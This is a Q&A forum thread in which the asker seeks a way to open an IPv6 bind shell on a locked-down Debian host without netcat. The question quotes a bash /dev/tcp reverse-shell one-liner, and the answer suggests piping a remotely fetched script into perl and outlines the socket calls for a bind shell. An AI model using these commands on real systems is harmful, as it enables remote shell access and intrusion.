# create listening port on IPV6 WITHOUT netcat

Tags: shell, networking, tcp, ipv6

I wish to be able to listen to a port (eventually creating a bind shell) on an IPV6 address.

I have tried using the netcat installed on the linux (debian) machine I am trying to bind. sadly it seems only to bind to the IPV4 TCP ports and not the IPV6. (it is an old version of netcat which does not support IPV6)

I know methods like this exist for reverse shells and I was wondering if there was anything similar for my situation?

```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

There are some rules of which I cannot do anything about:

I cannot install extra applications, I cannot update, I cannot create applications my self.

Comment: Why do you say you cannot update?

Comment: @MichaelHampton bit hard to update with only network access and a shell behind a nat

Answer (score 1):

No.  Read: [/dev/tcp listen instead of nc listen](https://unix.stackexchange.com/a/49947/29483).

Without further information, you could use the system version of perl, which is an essential package in Debian.  Write a single-file perl script.  You can almost certainly find a way to execute a single-file script without it existing as an application on the target system, e.g. `curl https://dropbox.com/.../script.pl | perl`.  The script will use the system calls `socket()`, `bind()`, `listen()`, `dup2()` to replace stdin & stdout before `close()`ing the original fd, and `exec()`.

`python` is nicer to program in, if you have the `standard` Debian packages installed.

Obviously if you had an `inetd` installed you could run that with your own configuration file.  If you don't mind speaking SSH and `sshd` is installed, then it would be possible to use that.  It would certainly be more secure than any of the other options :-P.  Read: [Is it possible to run sshd as a normal user?](https://serverfault.com/a/344301)

Comment: thanks for the reply security is probably the complete opposite of my desire! it could be dirty i just need this to happen :P but ty I guess i will have to look into more perl

Comment: no python? sadface.

Comment: I cannot enter brackets, or i would echo out python scripts, all brackets i enter break the bash... very limited console!